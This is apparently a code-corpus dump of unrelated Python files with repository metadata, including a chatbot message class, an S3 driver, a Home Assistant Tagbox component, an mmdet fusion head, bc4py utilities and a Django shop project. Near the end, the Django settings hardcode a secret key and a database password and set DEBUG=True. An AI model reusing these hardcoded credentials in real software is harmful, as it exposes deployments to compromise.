self['message'][-1]['message'].format(**format_information) else: self['message'] = self['message'].format(**format_information) return self def reflect_message(self, pre_message): for key in pre_message: if key not in ['message', 'from', 'time', 'answer_status', 'sending_status', 'collection', 'posting_status']: self[key] = pre_message[key] return self def reflect_metadata(self, pre_message): for key in pre_message: if key not in self: if key not in ['message', 'from', 'time', 'answer_status', 'sending_status', 'collection']: self[key] = pre_message[key] return self def keep_query(self, pre_message): if 'query' in pre_message: if 'query' in self: if self['query'] is None: self['query'] = pre_message['query'] else: self['query'] = pre_message['query'] return self def _if_possible_send(self, message): logi = True logi = logi and (message['from'] == 'bot') logi = logi and (message['message'] != '') return logi def _filter_message_2_post(self): posts, last_post = [], [] if self['collection']: messages = [m for m in self['message'] if self._if_possible_send(m)] if len(messages): last_post = [messages[-1]] posts = messages[:-1] else: if self._if_possible_send(self): last_post = [copy.copy(self)] return posts, last_post def _detect_message_sending_status(self): if 'sending_status' in self: return self['sending_status'] return True def _preformat_collection_messages(self): if not self._detect_message_sending_status(): if not self['collection']: self['message'] = [copy.copy(self)] self['collection'] = True return self return self def _is_prepared(self, message): if message['message'] == '': return False if 'sending_status' in self: return self['sending_status'] if 'posting_status' in self: return self['posting_status'] def is_prepared(self): if self['collection']: return any([self._is_prepared(e) for e in self['message']]) else: return self._is_prepared(self) return False def add_tags(self, tags): if tags is not None and (type(tags) in [list, str]): tags = tags if type(tags) == list else [tags] if 'tags' in self: old_tags = self['tags'] old_tags += tags old_tags = list(set(old_tags)) self['tags'] = old_tags else: self['tags'] = tags if self['collection']: if 'tags' in self['message'][-1]: old_tags = 
self['message'][-1]['tags'] old_tags += tags old_tags = list(set(old_tags)) self['message'][-1]['tags'] = old_tags self['tags'] = old_tags else: self['message'][-1]['tags'] = tags return self def collapse_message(self, message): self._preformat_collection_messages() if self['collection']: messagestext = copy.copy(self['message']) if message['collection']: messagestext += message['message'] else: messagestext.append(message) self.update(message) self['message'] = messagestext self['collection'] = True self.check_message() return self else: output_message = copy.copy(message) output_message['collection'] = False if 'query' in message: output_message['query'] = message['query'] output_message =\ ChatbotMessage.from_candidates_messages(output_message) output_message.check_message() return output_message def add_selector_types(self, selector_types): ## Store results in message self['selector_types'] = selector_types return self def add_entry_to_last_message(self, entry_var, var): self[entry_var] = var if self['collection']: self['message'][-1][entry_var] = var return self def structure_answer(self): ## Input selector types if self['collection']: self['message'][-1]['selector_types'] = self['selector_types'] self.check_message() return self def check_message(self): if self['collection']: assert(all([isinstance(m, dict) for m in self['message']])) assert(all([isinstance(m['message'], str) for m in self['message']])) else: assert(isinstance(self['message'], str))
2d85e566ab46559127ff094934cff6b9e3b4a756
e72db255e41332c113f929eb63815b2169038209
/Chapter08/audio-encode-server-4/audio_encode_server/s3.py
8585e1faf5d52e430754cde9e22635bf0eee6396
[ "MIT" ]
permissive
PacktPublishing/Hands-On-Reactive-Programming-with-Python
b196b971fe49a36da9f979790b8c31c98a659031
757d45e2023032c6074e26ad252530f3c89978bf
refs/heads/master
2023-02-07T01:03:37.648175
2023-02-05T18:21:17
2023-02-05T18:21:38
128,761,473
75
19
null
null
null
null
UTF-8
Python
false
false
2,077
py
import asyncio
from collections import namedtuple
from io import BytesIO

import reactivex as rx
import boto3
from boto3.session import Session
from cyclotron import Component

Source = namedtuple('Source', ['response'])
Sink = namedtuple('Sink', ['request'])

# Sink objects
Configure = namedtuple('Configure', [
    'access_key', 'secret_key',
    'bucket', 'endpoint_url', 'region_name'])
UploadObject = namedtuple('UploadObject', ['key', 'data', 'id'])

# Source objects
UploadReponse = namedtuple('UploadReponse', ['key', 'id'])


def make_driver(loop=None):
    if loop is None:
        loop = asyncio.get_event_loop()

    def driver(sink):
        def on_subscribe(observer, scheduler):
            client = None
            bucket = None

            def on_next(item):
                nonlocal client
                nonlocal bucket

                if type(item) is Configure:
                    session = Session(aws_access_key_id=item.access_key,
                                      aws_secret_access_key=item.secret_key)
                    client = session.client(
                        's3',
                        endpoint_url=item.endpoint_url,
                        region_name=item.region_name)
                    bucket = item.bucket
                elif type(item) is UploadObject:
                    data = BytesIO(item.data)
                    client.upload_fileobj(data, bucket, item.key)
                    loop.call_soon_threadsafe(observer.on_next, UploadReponse(
                        key=item.key,
                        id=item.id))
                else:
                    loop.call_soon_threadsafe(
                        observer.on_error,
                        "unknown item: {}".format(type(item)))

            sink.request.subscribe(
                on_next=on_next,
                on_error=lambda e: loop.call_soon_threadsafe(observer.on_error, e),
                on_completed=lambda: loop.call_soon_threadsafe(observer.on_completed))

        return Source(
            response=rx.create(on_subscribe)
        )

    return Component(call=driver, input=Sink)
0f0a43f2a910cb3bd27dccab958083608f47a592
0258e0c9595406ceb3de32067aff776bc2a58fa8
/06_p12.py
a649f413d98bebdcef131856db0da2a3d6949b5d
[]
no_license
akromibn37/python_code
72c016c361b3ba2e04c83e1d1a703171b0bd8819
41d1a09f8ec8696e37ad83c1a0cb6506c7f0f4f6
refs/heads/master
2020-03-21T22:57:25.111642
2018-06-29T14:14:33
2018-06-29T14:14:33
139,157,588
0
0
null
null
null
null
UTF-8
Python
false
false
511
py
data = input().strip()
l = []
for x in range(len(data)):
    l.append(data[x])

num = int(input().strip())
out = ""
i = 0
while i < num:
    out = ""
    command = [e for e in input().split()]
    if command[0] == "in":
        l.insert(int(command[2]), command[1])
    elif command[0] == "out":
        l.pop(int(command[1]))
    elif command[0] == "swap":
        x = l[int(command[1])]
        y = l[int(command[2])]
        l[int(command[1])] = y
        l[int(command[2])] = x
    for j in range(len(l)):
        out += l[j]
    print(out)
    i += 1
a3832070b1ec7002d6f2dd0a9f5bd280d29a3962
1fe8d4133981e53e88abf633046060b56fae883e
/venv/lib/python3.8/site-packages/tensorflow/python/keras/layers/cudnn_recurrent 2.py
96ae66c775e623fff4738688d4f11005c5261b33
[]
no_license
Akira331/flask-cifar10
6c49db8485038731ce67d23f0972b9574746c7a7
283e7a2867c77d4b6aba7aea9013bf241d35d76c
refs/heads/master
2023-06-14T16:35:06.384755
2021-07-05T14:09:15
2021-07-05T14:09:15
382,864,970
0
0
null
null
null
null
UTF-8
Python
false
false
130
py
version https://git-lfs.github.com/spec/v1
oid sha256:52c49577848819c4116b99c29c11e765e7a2d686e7ccb4dc7b84454bdf31510f
size 20854
69ef378642a90c904e60bcd86fa6932e967ed311
032117bbf248a76abd25fcc2355bc8ade84fa76a
/inheritance_4.py
b62203cddf2bf1a42b3576a58752aaab34cfb71a
[]
no_license
shefaligoel136/python_summer_training
ba8f28f6af008584b4239c73d466e4e9d35b4b01
0b97fea050342fe4ed95b18c5f7ed885a6c8ca23
refs/heads/master
2022-11-13T07:22:32.855717
2020-07-06T08:33:19
2020-07-06T08:33:19
277,480,122
0
0
null
null
null
null
UTF-8
Python
false
false
388
py
# using super
class a:
    def __init__(self):
        print("init of A")

    def feature1(self):
        print("feature 1 is working")

    def feature2(self):
        print("feature 2 is working")

class b(a):
    def __init__(self):
        super().__init__()
        print("init of B")

    def feature3(self):
        print("feature 3 is working")

    def feature4(self):
        print("feature 4 is working")

k = b()
k.feature1()
79445dc9be69e70168bbf832fc269c16f8377373
c5859d1bdf44c8452563f856dc4191b74e85ce21
/custom_components/image_processing/tagbox.py
163ce385bf2c8182fd5f439a3f58b3d206199a0e
[]
no_license
balloob/homeassistant-config
46774ea88ced4414e48e4f1f40af63ff67b6f990
9f341e4b695db56f3c4af7299a336d5a0f60cdcf
refs/heads/master
2020-03-21T03:10:31.729526
2018-06-18T18:27:54
2018-06-18T18:27:54
138,039,924
11
0
null
2018-06-20T13:56:12
2018-06-20T13:56:12
null
UTF-8
Python
false
false
4,157
py
""" Component that will search images for tagged objects via a local machinebox instance. For more details about this platform, please refer to the documentation at https://home-assistant.io/components/image_processing.tagbox """ import base64 import requests import logging import time import voluptuous as vol from homeassistant.core import split_entity_id import homeassistant.helpers.config_validation as cv from homeassistant.components.image_processing import ( PLATFORM_SCHEMA, ImageProcessingEntity, CONF_SOURCE, CONF_ENTITY_ID, CONF_NAME, DOMAIN) _LOGGER = logging.getLogger(__name__) CONF_ENDPOINT = 'endpoint' CONF_TAGS = 'tags' ROUNDING_DECIMALS = 2 PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({ vol.Required(CONF_ENDPOINT): cv.string, vol.Optional(CONF_TAGS, default=[]): vol.All(cv.ensure_list, [cv.string]), }) def setup_platform(hass, config, add_devices, discovery_info=None): """Set up the classifier.""" entities = [] for camera in config[CONF_SOURCE]: entities.append(Tagbox( camera.get(CONF_NAME), config[CONF_ENDPOINT], camera[CONF_ENTITY_ID], config[CONF_TAGS], )) add_devices(entities) class Tagbox(ImageProcessingEntity): """Perform a tag search via a Tagbox.""" def __init__(self, name, endpoint, camera_entity, tags): """Init with the API key and model id""" super().__init__() if name: # Since name is optional. self._name = name else: self._name = "Tagbox {0}".format( split_entity_id(camera_entity)[1]) self._camera = camera_entity self._default_tags = {tag: 0.0 for tag in tags} self._tags = self._default_tags self._url = "http://{}/tagbox/check".format(endpoint) self._state = "no_processing_performed" self._response_time = None def process_image(self, image): """Process an image.""" timer_start = time.perf_counter() try: response = requests.post( self._url, json=self.encode_image(image) ).json() except: response = {'success': False} if response['success']: elapsed_time = time.perf_counter() - timer_start self._response_time = round(elapsed_time, ROUNDING_DECIMALS) self._tags, self._state = self.process_response(response) else: self._state = "Request_failed" self._tags = self._default_tags def encode_image(self, image): """base64 encode an image stream.""" base64_img = base64.b64encode(image).decode('ascii') return {"base64": base64_img} def process_response(self, response): """Process response data, returning the processed tags and state.""" tags = self._default_tags.copy() tags.update(self.process_tags(response['tags'])) if response['custom_tags']: tags.update(self.process_tags(response['custom_tags'])) # Default tags have probability 0.0 and cause an exception. try: state = max(tags.keys(), key=(lambda k: tags[k])) except: state = "No_tags_identified" return tags, state def process_tags(self, tags_data): """Process tags data, returning the tag and rounded confidence.""" processed_tags = { tag['tag'].lower(): round(tag['confidence'], ROUNDING_DECIMALS) for tag in tags_data } return processed_tags @property def camera_entity(self): """Return camera entity id from process pictures.""" return self._camera @property def device_state_attributes(self): """Return other details about the sensor state.""" attr = self._tags.copy() attr.update({'response_time': self._response_time}) return attr @property def state(self): """Return the state of the entity.""" return self._state @property def name(self): """Return the name of the sensor.""" return self._name
5c0d30018cbe2c3ef11519938d2dcc3bbcfa328b
267ab87884d6c74f8d676c1b6cfebf7e217e2ea7
/index/views.py
79a1320fcddf6b714ccc0465ccd2299e1bfd4d22
[]
no_license
Emehinola/charlotte
0d564181de1f5419a67c06e7dba5cd81796cb1aa
c3175757f5ce7d3ceab272dad9a866c4bea4bd1d
refs/heads/master
2023-04-23T00:38:18.965089
2021-04-30T19:34:17
2021-04-30T19:34:17
363,119,132
0
0
null
null
null
null
UTF-8
Python
false
false
816
py
from django.shortcuts import render
from django.views import generic

from blog.models import Article, categories

# Create your views here.

class Home(generic.ListView):
    model = Article
    paginate_by = 30
    template_name = 'index/home.html'

    def get_context_data(self, **kwargs):
        context = {
            'must_read': Article.objects.filter(must_read=True)[:5],
            'articles': Article.objects.all(),
            'categories': get_category
        }
        return context

def get_category():  # return a list of blog categories
    raw = []
    readable = []
    for i in categories:
        raw.append(i[0])  # gets the first item of the list of tuples
        readable.append(i[1])  # gets the second item of the list of tuples
    output = zip(raw, readable)
    return output
de3fe45a87e82c646b0708bb94ef18a5f539f842
4d675034878c4b6510e1b45b856cc0a71af7f886
/mmdet/models/seg_heads/panoptic_fusion_heads/heuristic_fusion_head.py
06c1de2b9010fef13bd2322bbd3352d82a1f3e2f
[ "Apache-2.0", "BSD-2-Clause-Views", "MIT", "BSD-2-Clause" ]
permissive
shinya7y/UniverseNet
101ebc2ad8f15482ee45ea8d6561aa338a0fa49e
3652b18c7ce68122dae7a32670624727d50e0914
refs/heads/master
2023-07-22T08:25:42.646911
2023-07-08T18:09:34
2023-07-08T18:09:34
263,555,721
407
58
Apache-2.0
2023-01-27T01:13:31
2020-05-13T07:23:43
Python
UTF-8
Python
false
false
4,482
py
# Copyright (c) OpenMMLab. All rights reserved.
import torch

from mmdet.core.evaluation.panoptic_utils import INSTANCE_OFFSET
from mmdet.models.builder import HEADS
from .base_panoptic_fusion_head import BasePanopticFusionHead


@HEADS.register_module()
class HeuristicFusionHead(BasePanopticFusionHead):
    """Fusion Head with Heuristic method."""

    def __init__(self,
                 num_things_classes=80,
                 num_stuff_classes=53,
                 test_cfg=None,
                 init_cfg=None,
                 **kwargs):
        super(HeuristicFusionHead,
              self).__init__(num_things_classes, num_stuff_classes, test_cfg,
                             None, init_cfg, **kwargs)

    def forward_train(self, gt_masks=None, gt_semantic_seg=None, **kwargs):
        """HeuristicFusionHead has no training loss."""
        return dict()

    def _lay_masks(self, bboxes, labels, masks, overlap_thr=0.5):
        """Lay instance masks to a result map.

        Args:
            bboxes: The bboxes results, (K, 4).
            labels: The labels of bboxes, (K, ).
            masks: The instance masks, (K, H, W).
            overlap_thr: Threshold to determine whether two masks overlap.
                default: 0.5.

        Returns:
            Tensor: The result map, (H, W).
        """
        num_insts = bboxes.shape[0]
        id_map = torch.zeros(
            masks.shape[-2:], device=bboxes.device, dtype=torch.long)
        if num_insts == 0:
            return id_map, labels

        scores, bboxes = bboxes[:, -1], bboxes[:, :4]

        # Sort by score to use heuristic fusion
        order = torch.argsort(-scores)
        bboxes = bboxes[order]
        labels = labels[order]
        segm_masks = masks[order]

        instance_id = 1
        left_labels = []
        for idx in range(bboxes.shape[0]):
            _cls = labels[idx]
            _mask = segm_masks[idx]
            instance_id_map = torch.ones_like(
                _mask, dtype=torch.long) * instance_id
            area = _mask.sum()
            if area == 0:
                continue

            pasted = id_map > 0
            intersect = (_mask * pasted).sum()
            if (intersect / (area + 1e-5)) > overlap_thr:
                continue

            _part = _mask * (~pasted)
            id_map = torch.where(_part, instance_id_map, id_map)
            left_labels.append(_cls)
            instance_id += 1

        if len(left_labels) > 0:
            instance_labels = torch.stack(left_labels)
        else:
            instance_labels = bboxes.new_zeros((0, ), dtype=torch.long)
        assert instance_id == (len(instance_labels) + 1)
        return id_map, instance_labels

    def simple_test(self, det_bboxes, det_labels, mask_preds, seg_preds,
                    **kwargs):
        """Fuse the results of instance and semantic segmentations.

        Args:
            det_bboxes: The bboxes results, (K, 4).
            det_labels: The labels of bboxes, (K,).
            mask_preds: The masks results, (K, H, W).
            seg_preds: The semantic segmentation results,
                (K, num_stuff + 1, H, W).

        Returns:
            Tensor : The panoptic segmentation result, (H, W).
        """
        mask_preds = mask_preds >= self.test_cfg.mask_thr_binary
        id_map, labels = self._lay_masks(det_bboxes, det_labels, mask_preds,
                                         self.test_cfg.mask_overlap)

        seg_results = seg_preds.argmax(dim=0)
        seg_results = seg_results + self.num_things_classes

        pan_results = seg_results
        instance_id = 1
        for idx in range(det_labels.shape[0]):
            _mask = id_map == (idx + 1)
            if _mask.sum() == 0:
                continue
            _cls = labels[idx]
            # simply trust detection
            segment_id = _cls + instance_id * INSTANCE_OFFSET
            pan_results[_mask] = segment_id
            instance_id += 1

        ids, counts = torch.unique(
            pan_results % INSTANCE_OFFSET, return_counts=True)
        stuff_ids = ids[ids >= self.num_things_classes]
        stuff_counts = counts[ids >= self.num_things_classes]
        ignore_stuff_ids = stuff_ids[
            stuff_counts < self.test_cfg.stuff_area_limit]

        assert pan_results.ndim == 2
        pan_results[(pan_results.unsqueeze(2) == ignore_stuff_ids.reshape(
            1, 1, -1)).any(dim=2)] = self.num_classes

        return pan_results
bded7a0abc4bf1dc4955561f7e0715bcba19006f
7bd5ca970fbbe4a3ed0c7dadcf43ba8681a737f3
/codeforces/cf326-350/cf334/b.py
3d79209e1a77d7ad5f7c126cf1c70b802e0ece89
[]
no_license
roiti46/Contest
c0c35478cd80f675965d10b1a371e44084f9b6ee
c4b850d76796c5388d2e0d2234f90dc8acfaadfa
refs/heads/master
2021-01-17T13:23:30.551754
2017-12-10T13:06:42
2017-12-10T13:06:42
27,001,893
0
0
null
null
null
null
UTF-8
Python
false
false
1,258
py
# -*- coding: utf-8 -*-
import sys, copy, math, heapq, itertools as it, fractions, re, bisect, collections as coll

mod = 10**9 + 7

class UnionFind:
    def __init__(self, size):
        self.rank = [0] * size
        self.par = range(size)
        self.g_num = size

    def find(self, x):
        if x == self.par[x]:
            return x
        self.par[x] = self.find(self.par[x])
        return self.par[x]

    def same(self, x, y):
        return self.find(x) == self.find(y)

    def unite(self, x, y):
        x, y = self.find(x), self.find(y)
        if x == y:
            return
        self.g_num -= 1
        if (self.rank[x] > self.rank[y]):
            self.par[y] = x
        else:
            self.par[x] = y
            if (self.rank[x] == self.rank[y]):
                self.rank[y] += 1

    def group_num(self):
        return self.g_num

#prime = [1] * 1000005
#prime[0] = prime[1] = 0
#for i in xrange(int(1000005**0.5) + 1):
#    if prime[i]:
#        prime[2*i::i] = [0] * len(prime[2*i::i])

p, k = map(int, raw_input().split())

if k == 0:
    print pow(p, p - 1, mod)
    exit()

uf = UnionFind(p)
cnt = 0
for x in xrange(p):
    if x == k*x % p:
        if k > 1:
            cnt += 1
    else:
        uf.unite(x, k*x % p)

ans = pow(p, uf.group_num() - cnt, mod)
print ans
d2e145a737723d90d40cb49ba1513f4ce09da229
d0fcc2198f1caf5633c4fc0d004ba68714396f1b
/bc4py/utils.py
d1c4a85cb4d9f0df6c85fb081bee3a4001b51119
[ "MIT" ]
permissive
webclinic017/bc4py
4bfce04b666c2aaadda4b7ecc2a8270839231850
620b7d855ec957b3e2b4021cf8069d9dd128587a
refs/heads/master
2022-12-09T22:23:49.842255
2019-06-21T14:24:17
2019-06-21T14:24:17
null
0
0
null
null
null
null
UTF-8
Python
false
false
8,100
py
from bc4py.config import C, V
from bc4py.gittool import get_current_branch
from bc4py.chain.utils import GompertzCurve
from Cryptodome.Cipher import AES
from Cryptodome import Random
from Cryptodome.Hash import SHA256
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
from logging import getLogger, DEBUG, INFO, WARNING, ERROR
import multiprocessing
import os
import psutil
import sys

WALLET_VERSION = 0
log = getLogger('bc4py')
NAME2LEVEL = {
    'DEBUG': DEBUG,
    'INFO': INFO,
    'WARNING': WARNING,
    'ERROR': ERROR,
}


def set_database_path(sub_dir=None):
    V.DB_HOME_DIR = os.path.join(os.path.expanduser("~"), 'blockchain-py')
    if not os.path.exists(V.DB_HOME_DIR):
        os.makedirs(V.DB_HOME_DIR)
    if sub_dir:
        V.DB_HOME_DIR = os.path.join(V.DB_HOME_DIR, sub_dir)
        if not os.path.exists(V.DB_HOME_DIR):
            os.makedirs(V.DB_HOME_DIR)
    V.DB_ACCOUNT_PATH = os.path.join(V.DB_HOME_DIR, 'wallet.ver{}.dat'.format(WALLET_VERSION))


def set_blockchain_params(genesis_block, params):
    assert 'spawn' in multiprocessing.get_all_start_methods(), 'spawn start method not found'
    V.GENESIS_BLOCK = genesis_block
    V.GENESIS_PARAMS = params
    V.BECH32_HRP = params.get('hrp')
    V.BLOCK_GENESIS_TIME = params.get('genesis_time')
    V.BLOCK_MINING_SUPPLY = params.get('mining_supply')
    V.BLOCK_TIME_SPAN = params.get('block_span')
    V.BLOCK_REWARD = params.get('block_reward')
    V.COIN_DIGIT = params.get('digit_number')
    V.COIN_MINIMUM_PRICE = params.get('minimum_price')
    V.BLOCK_CONSENSUSES = params.get('consensus')
    GompertzCurve.k = V.BLOCK_MINING_SUPPLY
    V.BRANCH_NAME = get_current_branch()


def check_already_started():
    assert V.DB_HOME_DIR is not None
    # check already started
    pid_path = os.path.join(V.DB_HOME_DIR, 'pid.lock')
    if os.path.exists(pid_path):
        with open(pid_path, mode='r') as fp:
            pid = int(fp.read())
        if psutil.pid_exists(pid):
            raise RuntimeError('Already running blockchain-py pid={}'.format(pid))
    new_pid = os.getpid()
    with open(pid_path, mode='w') as fp:
        fp.write(str(new_pid))
    log.info("create new process lock file pid={}".format(new_pid))


def console_args_parser():
    """get help by `python publicnode.py -h`"""
    p = ArgumentParser(formatter_class=ArgumentDefaultsHelpFormatter)
    p.add_argument('--p2p', help='p2p server bind port', default=2000, type=int)
    p.add_argument('--rest', help='REST API bind port', default=3000, type=int)
    p.add_argument('--host', help='REST API bind host', default='127.0.0.1', type=str)
    p.add_argument('--user', '-u', help='API user name', default='user', type=str)
    p.add_argument('--password', '-p', help='API password', default='password', type=str)
    p.add_argument('--sub-dir', help='setup blockchain folder path', default=None)
    p.add_argument('--log-level', help='logging level', choices=list(NAME2LEVEL), default='INFO')
    p.add_argument('--log-path', help='record log file path', default=None, type=str)
    p.add_argument('--remove-log', help='remove old log file when start program', action='store_true')
    p.add_argument('--daemon', help='make process daemon', action='store_true')
    p.add_argument('--staking', help='enable coin base staking', action='store_true')
    p.add_argument('--solo-mining', help='solo mining for debug or testnet', action='store_true')
    return p.parse_args()


def check_process_status(f_daemon):
    if sys.platform == 'win32':
        # windows
        if f_daemon:
            if sys.executable.endswith("pythonw.exe"):
                sys.stdout = open(os.devnull, "w")
                sys.stderr = open(os.devnull, "w")
            else:
                print("ERROR: Please execute by `pythonw.exe` not `python.exe` if you enable daemon flag")
                sys.exit()
        else:
            if sys.executable.endswith("pythonw.exe"):
                print("ERROR: Please execute by `python.exe`")
                sys.exit()
            else:
                # stdin close to prevent lock on console
                sys.stdin.close()
    else:
        # other
        if f_daemon:
            pid = os.fork()
            if pid == 0:
                # child process (daemon)
                sys.stdout = open(os.devnull, "w")
                sys.stderr = open(os.devnull, "w")
            else:
                # main process
                print("INFO: Make daemon process pid={}".format(pid))
                sys.exit()
        else:
            # stdin close to prevent lock on console
            sys.stdin.close()


class AESCipher:

    @staticmethod
    def create_key():
        return os.urandom(AES.block_size)

    @staticmethod
    def encrypt(key, raw):
        assert isinstance(key, bytes)
        assert isinstance(raw, bytes), "input data must be bytes"
        # derive a fixed-length AES key from the supplied key material
        key = SHA256.new(key).digest()[:AES.block_size]
        raw = AESCipher._pad(raw)
        iv = Random.new().read(AES.block_size)
        cipher = AES.new(key, AES.MODE_CBC, iv)
        return iv + cipher.encrypt(raw)

    @staticmethod
    def decrypt(key, enc):
        assert isinstance(key, bytes)
        assert isinstance(enc, bytes), 'encrypted data must be bytes'
        key = SHA256.new(key).digest()[:AES.block_size]
        iv = enc[:AES.block_size]
        cipher = AES.new(key, AES.MODE_CBC, iv)
        raw = AESCipher._unpad(cipher.decrypt(enc[AES.block_size:]))
        if len(raw) == 0:
            raise ValueError("AES decryption error, not correct key")
        else:
            return raw

    @staticmethod
    def _pad(s):
        # PKCS#7-style padding: append N bytes, each with value N
        pad = AES.block_size - len(s) % AES.block_size
        return s + pad * pad.to_bytes(1, 'little')

    @staticmethod
    def _unpad(s):
        # strip the number of pad bytes recorded in the final byte
        return s[:-ord(s[len(s) - 1:])]


class ProgressBar:
    """
    terminal progressbar
    original: https://github.com/bozoh/console_progressbar
    author: Carlos Alexandre S. da Fonseca
    """

    def __init__(self, prefix, default_suffix='', total=100, decimals=0, length=50, fill='X', zfill='-'):
        self.prefix = prefix
        self.default_suffix = default_suffix
        self.__decimals = decimals
        self.__length = length
        self.__fill = fill
        self.__zfill = zfill
        self.__total = total

    def _generate_bar(self, iteration, suffix=None):
        percent = ("{0:." + str(self.__decimals) + "f}")
        percent = percent.format(100 * (iteration / float(self.__total)))
        filled_length = int(self.__length * iteration // self.__total)
        bar = self.__fill * filled_length + self.__zfill * (self.__length - filled_length)
        return '{0} |{1}| {2}% {3}'.format(self.prefix, bar, percent, suffix or self.default_suffix)

    def print_progress_bar(self, iteration, suffix=None):
        print('\r%s' % (self._generate_bar(iteration, suffix)), end='')
        sys.stdout.flush()

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        if exc_type is None:
            self.print_progress_bar(self.__total, 'Complete')
            print()
        else:
            print()
            sys.stdout.flush()
            log.error('Error on progress, {}'.format(exc_val))
        # returning True suppresses any exception raised inside the block
        return True


__all__ = [
    "set_database_path",
    "set_blockchain_params",
    "check_already_started",
    "console_args_parser",
    "check_process_status",
    "AESCipher",
    "ProgressBar",
]
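A minimal usage sketch for the two helpers above (an editorial illustration, not part of the original bc4py file); it assumes pycryptodomex is installed, and the plaintext and loop bounds are arbitrary:

# AESCipher round-trip: a fresh random IV is generated on every call, so two
# encryptions of the same plaintext differ, but decrypt() recovers the input.
key = AESCipher.create_key()    # 16 random bytes, hashed to an AES-128 key internally
token = AESCipher.encrypt(key, b'wallet seed')
assert AESCipher.decrypt(key, token) == b'wallet seed'

# ProgressBar as a context manager: prints 'Complete' on clean exit, and
# logs (and suppresses) any exception raised inside the block.
with ProgressBar('sync', total=100) as pb:
    for i in range(100):
        pb.print_progress_bar(i, suffix='block {}'.format(i))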
668657bcff004b73d7f1774f4f953091a5bf649f
3f55607c033fef615f8d0f9ef8d284f43d1709a1
/shop/shop/settings.py
04d5a80fe47afc58d6e082ce02f49aedb74d8b9d
[]
no_license
aakashres/shoppingcart
d37f7425f8585ac0463153a90ae4f1d2ed49c460
2060fac698130b78860072f5fcc0532ec716d087
refs/heads/master
2022-11-09T15:55:27.061262
2017-04-04T15:00:08
2017-04-04T15:00:08
273,651,566
0
0
null
null
null
null
UTF-8
Python
false
false
3,505
py
""" Django settings for shop project. Generated by 'django-admin startproject' using Django 1.10.5. For more information on this file, see https://docs.djangoproject.com/en/1.10/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.10/ref/settings/ """ import os # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = '_bai2f0i6@h=+dy+x1b(&i5$83kg0+g(rq6s5djrt=g+uunlvc' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = [ 'account', 'cart', 'messaging', 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'shop.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [os.path.join(BASE_DIR, 'templates'), ], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'shop.wsgi.application' # Database # https://docs.djangoproject.com/en/1.10/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.postgresql_psycopg2', 'NAME': 'shop', 'USER': 'prixa', 'PASSWORD': 'prixatech', 'HOST': 'localhost', 'PORT': '', } } # Password validation # https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/1.10/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'Asia/Kathmandu' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.10/howto/static-files/ STATIC_URL = '/static/' STATICFILES_DIRS = [ os.path.join(BASE_DIR, 'static'), ] STATIC_ROOT = os.path.join(os.path.dirname(BASE_DIR), "root", "static_cdn") MEDIA_URL = '/media/' MEDIA_ROOT = os.path.join(os.path.dirname(BASE_DIR), "root", "media_cdn")